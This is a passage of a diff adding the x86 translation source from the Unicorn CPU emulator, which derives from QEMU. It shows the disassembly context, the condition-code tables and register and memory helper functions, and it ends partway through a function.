License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ +#include +#include +#include +#include +#include "unicorn/platform.h" +#include + +#include "qemu/host-utils.h" +#include "cpu.h" +#include "tcg-op.h" +#include "exec/cpu_ldst.h" + +#include "exec/helper-proto.h" +#include "exec/helper-gen.h" + +#include "uc_priv.h" + +#define PREFIX_REPZ 0x01 +#define PREFIX_REPNZ 0x02 +#define PREFIX_LOCK 0x04 +#define PREFIX_DATA 0x08 +#define PREFIX_ADR 0x10 +#define PREFIX_VEX 0x20 + +#ifdef TARGET_X86_64 +#define CODE64(s) ((s)->code64) +#define REX_X(s) ((s)->rex_x) +#define REX_B(s) ((s)->rex_b) +#else +#define CODE64(s) 0 +#define REX_X(s) 0 +#define REX_B(s) 0 +#endif + +#ifdef TARGET_X86_64 +# define ctztl ctz64 +# define clztl clz64 +#else +# define ctztl ctz32 +# define clztl clz32 +#endif + +#include "exec/gen-icount.h" + +typedef struct DisasContext { + /* current insn context */ + int override; /* -1 if no override */ + int prefix; + TCGMemOp aflag; + TCGMemOp dflag; + target_ulong pc; /* pc = eip + cs_base */ + int is_jmp; /* 1 = means jump (stop translation), 2 means CPU + static state change (stop translation) */ + /* current block context */ + target_ulong cs_base; /* base of CS segment */ + int pe; /* protected mode */ + int code32; /* 32 bit code segment */ +#ifdef TARGET_X86_64 + int lma; /* long mode active */ + int code64; /* 64 bit code segment */ + int rex_x, rex_b; +#endif + int vex_l; /* vex vector length */ + int vex_v; /* vex vvvv register, without 1's compliment. */ + int ss32; /* 32 bit stack segment */ + CCOp cc_op; /* current CC operation */ + CCOp last_cc_op; /* Unicorn: last CC operation. 
Save this to see if cc_op has changed */ + bool cc_op_dirty; + int addseg; /* non zero if either DS/ES/SS have a non zero base */ + int f_st; /* currently unused */ + int vm86; /* vm86 mode */ + int cpl; + int iopl; + int tf; /* TF cpu flag */ + int singlestep_enabled; /* "hardware" single step enabled */ + int jmp_opt; /* use direct block chaining for direct jumps */ + int mem_index; /* select memory access functions */ + uint64_t flags; /* all execution flags */ + struct TranslationBlock *tb; + int popl_esp_hack; /* for correct popl with esp base handling */ + int rip_offset; /* only used in x86_64, but left for simplicity */ + int cpuid_features; + int cpuid_ext_features; + int cpuid_ext2_features; + int cpuid_ext3_features; + int cpuid_7_0_ebx_features; + struct uc_struct *uc; + + // Unicorn + target_ulong prev_pc; /* save address of the previous instruction */ +} DisasContext; + +static void gen_eob(DisasContext *s); +static void gen_jmp(DisasContext *s, target_ulong eip); +static void gen_jmp_tb(DisasContext *s, target_ulong eip, int tb_num); +static void gen_op(DisasContext *s, int op, TCGMemOp ot, int d); + +/* i386 arith/logic operations */ +enum { + OP_ADDL, + OP_ORL, + OP_ADCL, + OP_SBBL, + OP_ANDL, + OP_SUBL, + OP_XORL, + OP_CMPL, +}; + +/* i386 shift ops */ +enum { + OP_ROL, + OP_ROR, + OP_RCL, + OP_RCR, + OP_SHL, + OP_SHR, + OP_SHL1, /* undocumented */ + OP_SAR = 7, +}; + +enum { + JCC_O, + JCC_B, + JCC_Z, + JCC_BE, + JCC_S, + JCC_P, + JCC_L, + JCC_LE, +}; + +enum { + /* I386 int registers */ + OR_EAX, /* MUST be even numbered */ + OR_ECX, + OR_EDX, + OR_EBX, + OR_ESP, + OR_EBP, + OR_ESI, + OR_EDI, + + OR_TMP0 = 16, /* temporary operand register */ + OR_TMP1, + OR_A0, /* temporary register used when doing address evaluation */ +}; + +enum { + USES_CC_DST = 1, + USES_CC_SRC = 2, + USES_CC_SRC2 = 4, + USES_CC_SRCT = 8, +}; + +/* Bit set if the global variable is live after setting CC_OP to X. 
*/ +static const uint8_t cc_op_live[CC_OP_NB] = { +#ifdef _MSC_VER + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_DYNAMIC, /* must use dynamic code to get cc_op */ + USES_CC_SRC, // CC_OP_EFLAGS, /* all cc are explicitly computed, CC_SRC = flags */ + + USES_CC_DST | USES_CC_SRC, // CC_OP_MULB, /* modify all flags, C, O = (CC_SRC != 0) */ + USES_CC_DST | USES_CC_SRC, // CC_OP_MULW, + USES_CC_DST | USES_CC_SRC, // CC_OP_MULL, + USES_CC_DST | USES_CC_SRC, // CC_OP_MULQ, + + USES_CC_DST | USES_CC_SRC, // CC_OP_ADDB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + USES_CC_DST | USES_CC_SRC, // CC_OP_ADDW, + USES_CC_DST | USES_CC_SRC, // CC_OP_ADDL, + USES_CC_DST | USES_CC_SRC, // CC_OP_ADDQ, + + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_ADCB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_ADCW, + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_ADCL, + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_ADCQ, + + USES_CC_DST | USES_CC_SRC | USES_CC_SRCT, // CC_OP_SUBB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + USES_CC_DST | USES_CC_SRC | USES_CC_SRCT, // CC_OP_SUBW, + USES_CC_DST | USES_CC_SRC | USES_CC_SRCT, // CC_OP_SUBL, + USES_CC_DST | USES_CC_SRC | USES_CC_SRCT, // CC_OP_SUBQ, + + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_SBBB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_SBBW, + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_SBBL, + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_SBBQ, + + USES_CC_DST, // CC_OP_LOGICB, /* modify all flags, CC_DST = res */ + USES_CC_DST, // CC_OP_LOGICW, + USES_CC_DST, // CC_OP_LOGICL, + USES_CC_DST, // CC_OP_LOGICQ, + + USES_CC_DST | USES_CC_SRC, // CC_OP_INCB, /* modify all flags except, CC_DST = res, CC_SRC = C */ + USES_CC_DST | USES_CC_SRC, // CC_OP_INCW, + USES_CC_DST | USES_CC_SRC, // CC_OP_INCL, + USES_CC_DST | USES_CC_SRC, // CC_OP_INCQ, + + USES_CC_DST | 
USES_CC_SRC, // CC_OP_DECB, /* modify all flags except, CC_DST = res, CC_SRC = C */ + USES_CC_DST | USES_CC_SRC, // CC_OP_DECW, + USES_CC_DST | USES_CC_SRC, // CC_OP_DECL, + USES_CC_DST | USES_CC_SRC, // CC_OP_DECQ, + + USES_CC_DST | USES_CC_SRC, // CC_OP_SHLB, /* modify all flags, CC_DST = res, CC_SRC.msb = C */ + USES_CC_DST | USES_CC_SRC, // CC_OP_SHLW, + USES_CC_DST | USES_CC_SRC, // CC_OP_SHLL, + USES_CC_DST | USES_CC_SRC, // CC_OP_SHLQ, + + USES_CC_DST | USES_CC_SRC, // CC_OP_SARB, /* modify all flags, CC_DST = res, CC_SRC.lsb = C */ + USES_CC_DST | USES_CC_SRC, // CC_OP_SARW, + USES_CC_DST | USES_CC_SRC, // CC_OP_SARL, + USES_CC_DST | USES_CC_SRC, // CC_OP_SARQ, + + USES_CC_DST | USES_CC_SRC, // CC_OP_BMILGB, /* Z,S via CC_DST, C = SRC==0; O=0; P,A undefined */ + USES_CC_DST | USES_CC_SRC, // CC_OP_BMILGW, + USES_CC_DST | USES_CC_SRC, // CC_OP_BMILGL, + USES_CC_DST | USES_CC_SRC, // CC_OP_BMILGQ, + + USES_CC_DST | USES_CC_SRC, // CC_OP_ADCX, /* CC_DST = C, CC_SRC = rest. */ + USES_CC_SRC | USES_CC_SRC2, // CC_OP_ADOX, /* CC_DST = O, CC_SRC = rest. */ + USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, // CC_OP_ADCOX, /* CC_DST = C, CC_SRC2 = O, CC_SRC = rest. */ + + 0, // CC_OP_CLR, /* Z set, all other flags clear. */ +#else + [CC_OP_DYNAMIC] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, + [CC_OP_EFLAGS] = USES_CC_SRC, + [CC_OP_MULB ... CC_OP_MULQ] = USES_CC_DST | USES_CC_SRC, + [CC_OP_ADDB ... CC_OP_ADDQ] = USES_CC_DST | USES_CC_SRC, + [CC_OP_ADCB ... CC_OP_ADCQ] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, + [CC_OP_SUBB ... CC_OP_SUBQ] = USES_CC_DST | USES_CC_SRC | USES_CC_SRCT, + [CC_OP_SBBB ... CC_OP_SBBQ] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, + [CC_OP_LOGICB ... CC_OP_LOGICQ] = USES_CC_DST, + [CC_OP_INCB ... CC_OP_INCQ] = USES_CC_DST | USES_CC_SRC, + [CC_OP_DECB ... CC_OP_DECQ] = USES_CC_DST | USES_CC_SRC, + [CC_OP_SHLB ... CC_OP_SHLQ] = USES_CC_DST | USES_CC_SRC, + [CC_OP_SARB ... CC_OP_SARQ] = USES_CC_DST | USES_CC_SRC, + [CC_OP_BMILGB ... 
CC_OP_BMILGQ] = USES_CC_DST | USES_CC_SRC, + [CC_OP_ADCX] = USES_CC_DST | USES_CC_SRC, + [CC_OP_ADOX] = USES_CC_SRC | USES_CC_SRC2, + [CC_OP_ADCOX] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, + [CC_OP_CLR] = 0, +#endif +}; + +static inline void gen_jmp_im(DisasContext *s, target_ulong pc); + +static void set_cc_op(DisasContext *s, CCOp op) +{ + int dead; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_cc_op = tcg_ctx->cpu_cc_op; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv cpu_cc_src2 = *(TCGv *)tcg_ctx->cpu_cc_src2; + TCGv cpu_cc_srcT = *(TCGv *)tcg_ctx->cpu_cc_srcT; + + if (s->cc_op == op) { + return; + } + + /* Discard CC computation that will no longer be used. */ + dead = cc_op_live[s->cc_op] & ~cc_op_live[op]; + if (dead & USES_CC_DST) { + tcg_gen_discard_tl(tcg_ctx, cpu_cc_dst); + } + if (dead & USES_CC_SRC) { + tcg_gen_discard_tl(tcg_ctx, cpu_cc_src); + } + if (dead & USES_CC_SRC2) { + tcg_gen_discard_tl(tcg_ctx, cpu_cc_src2); + } + if (dead & USES_CC_SRCT) { + tcg_gen_discard_tl(tcg_ctx, cpu_cc_srcT); + } + + if (op == CC_OP_DYNAMIC) { + /* The DYNAMIC setting is translator only, and should never be + stored. Thus we always consider it clean. */ + s->cc_op_dirty = false; + } else { + /* Discard any computed CC_OP value (see shifts). 
*/ + if (s->cc_op == CC_OP_DYNAMIC) { + tcg_gen_discard_i32(tcg_ctx, cpu_cc_op); + } + s->cc_op_dirty = true; + } + s->cc_op = op; +} + +static void gen_update_cc_op(DisasContext *s) +{ + if (s->cc_op_dirty) { + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_cc_op = tcg_ctx->cpu_cc_op; + + tcg_gen_movi_i32(tcg_ctx, cpu_cc_op, s->cc_op); + s->cc_op_dirty = false; + } +} + +static void fpu_update_ip(CPUX86State *env, target_ulong pc) +{ + env->fpip = pc; +} + +#ifdef TARGET_X86_64 + +#define NB_OP_SIZES 4 + +#else /* !TARGET_X86_64 */ + +#define NB_OP_SIZES 3 + +#endif /* !TARGET_X86_64 */ + +#if defined(HOST_WORDS_BIGENDIAN) +#define REG_B_OFFSET (sizeof(target_ulong) - 1) +#define REG_H_OFFSET (sizeof(target_ulong) - 2) +#define REG_W_OFFSET (sizeof(target_ulong) - 2) +#define REG_L_OFFSET (sizeof(target_ulong) - 4) +#define REG_LH_OFFSET (sizeof(target_ulong) - 8) +#else +#define REG_B_OFFSET 0 +#define REG_H_OFFSET 1 +#define REG_W_OFFSET 0 +#define REG_L_OFFSET 0 +#define REG_LH_OFFSET 4 +#endif + +/* In instruction encodings for byte register accesses the + * register number usually indicates "low 8 bits of register N"; + * however there are some special cases where N 4..7 indicates + * [AH, CH, DH, BH], ie "bits 15..8 of register N-4". Return + * true for this special case, false otherwise. + */ +static inline bool byte_reg_is_xH(int x86_64_hregs, int reg) +{ + if (reg < 4) { + return false; + } +#ifdef TARGET_X86_64 + if (reg >= 8 || x86_64_hregs) { + return false; + } +#endif + return true; +} + +/* Select the size of a push/pop operation. */ +static inline TCGMemOp mo_pushpop(DisasContext *s, TCGMemOp ot) +{ + if (CODE64(s)) { + return ot == MO_16 ? MO_16 : MO_64; + } else { + return ot; + } +} + +/* Select only size 64 else 32. Used for SSE operand sizes. */ +static inline TCGMemOp mo_64_32(TCGMemOp ot) +{ +#ifdef TARGET_X86_64 + return ot == MO_64 ? MO_64 : MO_32; +#else + return MO_32; +#endif +} + +/* Select size 8 if lsb of B is clear, else OT. 
Used for decoding + byte vs word opcodes. */ +static inline TCGMemOp mo_b_d(int b, TCGMemOp ot) +{ + return b & 1 ? ot : MO_8; +} + +/* Select size 8 if lsb of B is clear, else OT capped at 32. + Used for decoding operand size of port opcodes. */ +static inline TCGMemOp mo_b_d32(int b, TCGMemOp ot) +{ + return b & 1 ? (ot == MO_16 ? MO_16 : MO_32) : MO_8; +} + +static void gen_op_mov_reg_v(TCGContext *s, TCGMemOp ot, int reg, TCGv t0) +{ + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + switch(ot) { + case MO_8: + if (!byte_reg_is_xH(s->x86_64_hregs, reg)) { + tcg_gen_deposit_tl(s, *cpu_regs[reg], *cpu_regs[reg], t0, 0, 8); + } else { + tcg_gen_deposit_tl(s, *cpu_regs[reg - 4], *cpu_regs[reg - 4], t0, 8, 8); + } + break; + case MO_16: + tcg_gen_deposit_tl(s, *cpu_regs[reg], *cpu_regs[reg], t0, 0, 16); + break; + case MO_32: + /* For x86_64, this sets the higher half of register to zero. + For i386, this is equivalent to a mov. */ + tcg_gen_ext32u_tl(s, *cpu_regs[reg], t0); + break; +#ifdef TARGET_X86_64 + case MO_64: + tcg_gen_mov_tl(s, *cpu_regs[reg], t0); + break; +#endif + default: + tcg_abort(); + } +} + +static inline void gen_op_mov_v_reg(TCGContext *s, TCGMemOp ot, TCGv t0, int reg) +{ + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + if (ot == MO_8 && byte_reg_is_xH(s->x86_64_hregs, reg)) { + tcg_gen_shri_tl(s, t0, *cpu_regs[reg - 4], 8); + tcg_gen_ext8u_tl(s, t0, t0); + } else { + tcg_gen_mov_tl(s, t0, *cpu_regs[reg]); + } +} + +static inline void gen_op_movl_A0_reg(TCGContext *s, int reg) +{ + TCGv cpu_A0 = *(TCGv *)s->cpu_A0; + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + tcg_gen_mov_tl(s, cpu_A0, *cpu_regs[reg]); +} + +static inline void gen_op_addl_A0_im(TCGContext *s, int32_t val) +{ + TCGv cpu_A0 = *(TCGv *)s->cpu_A0; + + tcg_gen_addi_tl(s, cpu_A0, cpu_A0, val); +#ifdef TARGET_X86_64 + tcg_gen_andi_tl(s, cpu_A0, cpu_A0, 0xffffffff); +#endif +} + +#ifdef TARGET_X86_64 +static inline void gen_op_addq_A0_im(TCGContext *s, int64_t val) +{ + TCGv cpu_A0 = *(TCGv 
*)s->cpu_A0; + + tcg_gen_addi_tl(s, cpu_A0, cpu_A0, val); +} +#endif + +static void gen_add_A0_im(DisasContext *s, int val) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; +#ifdef TARGET_X86_64 + if (CODE64(s)) + gen_op_addq_A0_im(tcg_ctx, val); + else +#endif + gen_op_addl_A0_im(tcg_ctx, val); +} + +static inline void gen_op_jmp_v(TCGContext *s, TCGv dest) +{ + tcg_gen_st_tl(s, dest, s->cpu_env, offsetof(CPUX86State, eip)); +} + +static inline void gen_op_add_reg_im(TCGContext *s, TCGMemOp size, int reg, int32_t val) +{ + TCGv cpu_tmp0 = *(TCGv *)s->cpu_tmp0; + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + tcg_gen_addi_tl(s, cpu_tmp0, *cpu_regs[reg], val); + gen_op_mov_reg_v(s, size, reg, cpu_tmp0); +} + +static inline void gen_op_add_reg_T0(TCGContext *s, TCGMemOp size, int reg) +{ + TCGv cpu_tmp0 = *(TCGv *)s->cpu_tmp0; + TCGv **cpu_T = (TCGv **)s->cpu_T; + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + tcg_gen_add_tl(s, cpu_tmp0, *cpu_regs[reg], *cpu_T[0]); + gen_op_mov_reg_v(s, size, reg, cpu_tmp0); +} + +static inline void gen_op_addl_A0_reg_sN(TCGContext *s, int shift, int reg) +{ + TCGv cpu_A0 = *(TCGv *)s->cpu_A0; + TCGv cpu_tmp0 = *(TCGv *)s->cpu_tmp0; + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + tcg_gen_mov_tl(s, cpu_tmp0, *cpu_regs[reg]); + if (shift != 0) + tcg_gen_shli_tl(s, cpu_tmp0, cpu_tmp0, shift); + tcg_gen_add_tl(s, cpu_A0, cpu_A0, cpu_tmp0); + /* For x86_64, this sets the higher half of register to zero. + For i386, this is equivalent to a nop. 
*/ + tcg_gen_ext32u_tl(s, cpu_A0, cpu_A0); +} + +static inline void gen_op_movl_A0_seg(TCGContext *s, int reg) +{ + TCGv cpu_A0 = *(TCGv *)s->cpu_A0; + + tcg_gen_ld32u_tl(s, cpu_A0, s->cpu_env, offsetof(CPUX86State, segs[reg].base) + REG_L_OFFSET); +} + +static inline void gen_op_addl_A0_seg(DisasContext *s, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + + tcg_gen_ld_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUX86State, segs[reg].base)); +#ifdef TARGET_X86_64 + if (CODE64(s)) { + tcg_gen_andi_tl(tcg_ctx, cpu_A0, cpu_A0, 0xffffffff); + tcg_gen_add_tl(tcg_ctx, cpu_A0, cpu_A0, cpu_tmp0); + } else { + tcg_gen_add_tl(tcg_ctx, cpu_A0, cpu_A0, cpu_tmp0); + tcg_gen_andi_tl(tcg_ctx, cpu_A0, cpu_A0, 0xffffffff); + } +#else + tcg_gen_add_tl(tcg_ctx, cpu_A0, cpu_A0, cpu_tmp0); +#endif +} + +#ifdef TARGET_X86_64 +static inline void gen_op_movq_A0_seg(TCGContext *s, int reg) +{ + TCGv cpu_A0 = *(TCGv *)s->cpu_A0; + + tcg_gen_ld_tl(s, cpu_A0, s->cpu_env, offsetof(CPUX86State, segs[reg].base)); +} + +static inline void gen_op_addq_A0_seg(TCGContext *s, int reg) +{ + TCGv cpu_A0 = *(TCGv *)s->cpu_A0; + TCGv cpu_tmp0 = *(TCGv *)s->cpu_tmp0; + + tcg_gen_ld_tl(s, cpu_tmp0, s->cpu_env, offsetof(CPUX86State, segs[reg].base)); + tcg_gen_add_tl(s, cpu_A0, cpu_A0, cpu_tmp0); +} + +static inline void gen_op_movq_A0_reg(TCGContext *s, int reg) +{ + TCGv cpu_A0 = *(TCGv *)s->cpu_A0; + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + tcg_gen_mov_tl(s, cpu_A0, *cpu_regs[reg]); +} + +static inline void gen_op_addq_A0_reg_sN(TCGContext *s, int shift, int reg) +{ + TCGv cpu_A0 = *(TCGv *)s->cpu_A0; + TCGv cpu_tmp0 = *(TCGv *)s->cpu_tmp0; + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + tcg_gen_mov_tl(s, cpu_tmp0, *cpu_regs[reg]); + if (shift != 0) + tcg_gen_shli_tl(s, cpu_tmp0, cpu_tmp0, shift); + tcg_gen_add_tl(s, cpu_A0, cpu_A0, cpu_tmp0); +} +#endif + +static inline void gen_op_ld_v(DisasContext *s, 
int idx, TCGv t0, TCGv a0) +{ + if (HOOK_EXISTS(s->uc, UC_HOOK_MEM_READ)) + gen_jmp_im(s, s->prev_pc); // Unicorn: sync EIP + tcg_gen_qemu_ld_tl(s->uc, t0, a0, s->mem_index, idx | MO_LE); +} + +static inline void gen_op_st_v(DisasContext *s, int idx, TCGv t0, TCGv a0) +{ + if (HOOK_EXISTS(s->uc, UC_HOOK_MEM_WRITE)) + gen_jmp_im(s, s->prev_pc); // Unicorn: sync EIP + tcg_gen_qemu_st_tl(s->uc, t0, a0, s->mem_index, idx | MO_LE); +} + +static inline void gen_op_st_rm_T0_A0(DisasContext *s, int idx, int d) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + if (d == OR_TMP0) { + gen_op_st_v(s, idx, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_reg_v(tcg_ctx, idx, d, *cpu_T[0]); + } +} + +static inline void gen_jmp_im(DisasContext *s, target_ulong pc) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + + tcg_gen_movi_tl(tcg_ctx, cpu_tmp0, pc); + gen_op_jmp_v(tcg_ctx, cpu_tmp0); +} + +static inline void gen_string_movl_A0_ESI(DisasContext *s) +{ + int override; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + + override = s->override; + switch (s->aflag) { +#ifdef TARGET_X86_64 + case MO_64: + if (override >= 0) { + gen_op_movq_A0_seg(tcg_ctx, override); + gen_op_addq_A0_reg_sN(tcg_ctx, 0, R_ESI); + } else { + gen_op_movq_A0_reg(tcg_ctx, R_ESI); + } + break; +#endif + case MO_32: + /* 32 bit address */ + if (s->addseg && override < 0) + override = R_DS; + if (override >= 0) { + gen_op_movl_A0_seg(tcg_ctx, override); + gen_op_addl_A0_reg_sN(tcg_ctx, 0, R_ESI); + } else { + gen_op_movl_A0_reg(tcg_ctx, R_ESI); + } + break; + case MO_16: + /* 16 address, always override */ + if (override < 0) + override = R_DS; + tcg_gen_ext16u_tl(tcg_ctx, cpu_A0, *cpu_regs[R_ESI]); + gen_op_addl_A0_seg(s, override); + break; + default: + tcg_abort(); + } +} + +static inline void 
gen_string_movl_A0_EDI(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + + switch (s->aflag) { +#ifdef TARGET_X86_64 + case MO_64: + gen_op_movq_A0_reg(tcg_ctx, R_EDI); + break; +#endif + case MO_32: + if (s->addseg) { + gen_op_movl_A0_seg(tcg_ctx, R_ES); + gen_op_addl_A0_reg_sN(tcg_ctx, 0, R_EDI); + } else { + gen_op_movl_A0_reg(tcg_ctx, R_EDI); + } + break; + case MO_16: + tcg_gen_ext16u_tl(tcg_ctx, cpu_A0, *cpu_regs[R_EDI]); + gen_op_addl_A0_seg(s, R_ES); + break; + default: + tcg_abort(); + } +} + +static inline void gen_op_movl_T0_Dshift(TCGContext *s, TCGMemOp ot) +{ + TCGv **cpu_T = (TCGv **)s->cpu_T; + + tcg_gen_ld32s_tl(s, *cpu_T[0], s->cpu_env, offsetof(CPUX86State, df)); + tcg_gen_shli_tl(s, *cpu_T[0], *cpu_T[0], ot); +}; + +static TCGv gen_ext_tl(TCGContext *s, TCGv dst, TCGv src, TCGMemOp size, bool sign) +{ + switch (size) { + case MO_8: + if (sign) { + tcg_gen_ext8s_tl(s, dst, src); + } else { + tcg_gen_ext8u_tl(s, dst, src); + } + return dst; + case MO_16: + if (sign) { + tcg_gen_ext16s_tl(s, dst, src); + } else { + tcg_gen_ext16u_tl(s, dst, src); + } + return dst; +#ifdef TARGET_X86_64 + case MO_32: + if (sign) { + tcg_gen_ext32s_tl(s, dst, src); + } else { + tcg_gen_ext32u_tl(s, dst, src); + } + return dst; +#endif + default: + return src; + } +} + +static void gen_extu(TCGContext *s, TCGMemOp ot, TCGv reg) +{ + gen_ext_tl(s, reg, reg, ot, false); +} + +static void gen_exts(TCGContext *s, TCGMemOp ot, TCGv reg) +{ + gen_ext_tl(s, reg, reg, ot, true); +} + +static inline void gen_op_jnz_ecx(TCGContext *s, TCGMemOp size, int label1) +{ + TCGv cpu_tmp0 = *(TCGv *)s->cpu_tmp0; + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + tcg_gen_mov_tl(s, cpu_tmp0, *cpu_regs[R_ECX]); + gen_extu(s, size, cpu_tmp0); + tcg_gen_brcondi_tl(s, TCG_COND_NE, cpu_tmp0, 0, label1); +} + +static inline void gen_op_jz_ecx(TCGContext *s, TCGMemOp size, int label1) +{ + TCGv 
cpu_tmp0 = *(TCGv *)s->cpu_tmp0; + TCGv **cpu_regs = (TCGv **)s->cpu_regs; + + tcg_gen_mov_tl(s, cpu_tmp0, *cpu_regs[R_ECX]); + gen_extu(s, size, cpu_tmp0); + tcg_gen_brcondi_tl(s, TCG_COND_EQ, cpu_tmp0, 0, label1); +} + +static void gen_helper_in_func(TCGContext *s, TCGMemOp ot, TCGv v, TCGv_i32 n) +{ + switch (ot) { + case MO_8: + gen_helper_inb(s, v, tcg_const_ptr(s, s->uc), n); + break; + case MO_16: + gen_helper_inw(s, v, tcg_const_ptr(s, s->uc), n); + break; + case MO_32: + gen_helper_inl(s, v, tcg_const_ptr(s, s->uc), n); + break; + default: + tcg_abort(); + } +} + +static void gen_helper_out_func(TCGContext *s, TCGMemOp ot, TCGv_i32 v, TCGv_i32 n) +{ + switch (ot) { + case MO_8: + gen_helper_outb(s, tcg_const_ptr(s, s->uc), v, n); + break; + case MO_16: + gen_helper_outw(s, tcg_const_ptr(s, s->uc), v, n); + break; + case MO_32: + gen_helper_outl(s, tcg_const_ptr(s, s->uc), v, n); + break; + default: + tcg_abort(); + } +} + +static void gen_check_io(DisasContext *s, TCGMemOp ot, target_ulong cur_eip, + uint32_t svm_flags) +{ + int state_saved; + target_ulong next_eip; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_tmp2_i32 = tcg_ctx->cpu_tmp2_i32; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + // Unicorn: allow all I/O instructions + return; + + state_saved = 0; + if (s->pe && (s->cpl > s->iopl || s->vm86)) { + gen_update_cc_op(s); + gen_jmp_im(s, cur_eip); + state_saved = 1; + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + switch (ot) { + case MO_8: + gen_helper_check_iob(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp2_i32); + break; + case MO_16: + gen_helper_check_iow(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp2_i32); + break; + case MO_32: + gen_helper_check_iol(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp2_i32); + break; + default: + tcg_abort(); + } + } + if(s->flags & HF_SVMI_MASK) { + if (!state_saved) { + gen_update_cc_op(s); + gen_jmp_im(s, cur_eip); + } + svm_flags |= (1 << (4 + ot)); + next_eip = s->pc - s->cs_base; + tcg_gen_trunc_tl_i32(tcg_ctx, 
cpu_tmp2_i32, *cpu_T[0]); + gen_helper_svm_check_io(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp2_i32, + tcg_const_i32(tcg_ctx, svm_flags), + tcg_const_i32(tcg_ctx, next_eip - cur_eip)); + } +} + +static inline void gen_movs(DisasContext *s, TCGMemOp ot) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + gen_string_movl_A0_ESI(s); + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + gen_string_movl_A0_EDI(s); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + gen_op_movl_T0_Dshift(tcg_ctx, ot); + gen_op_add_reg_T0(tcg_ctx, s->aflag, R_ESI); + gen_op_add_reg_T0(tcg_ctx, s->aflag, R_EDI); +} + +static void gen_op_update1_cc(TCGContext *s) +{ + TCGv cpu_cc_dst = *(TCGv *)s->cpu_cc_dst; + TCGv **cpu_T = (TCGv **)s->cpu_T; + + tcg_gen_mov_tl(s, cpu_cc_dst, *cpu_T[0]); +} + +static void gen_op_update2_cc(TCGContext *s) +{ + TCGv cpu_cc_dst = *(TCGv *)s->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)s->cpu_cc_src; + TCGv **cpu_T = (TCGv **)s->cpu_T; + + tcg_gen_mov_tl(s, cpu_cc_src, *cpu_T[1]); + tcg_gen_mov_tl(s, cpu_cc_dst, *cpu_T[0]); +} + +static void gen_op_update3_cc(TCGContext *s, TCGv reg) +{ + TCGv cpu_cc_dst = *(TCGv *)s->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)s->cpu_cc_src; + TCGv cpu_cc_src2 = *(TCGv *)s->cpu_cc_src2; + TCGv **cpu_T = (TCGv **)s->cpu_T; + + tcg_gen_mov_tl(s, cpu_cc_src2, reg); + tcg_gen_mov_tl(s, cpu_cc_src, 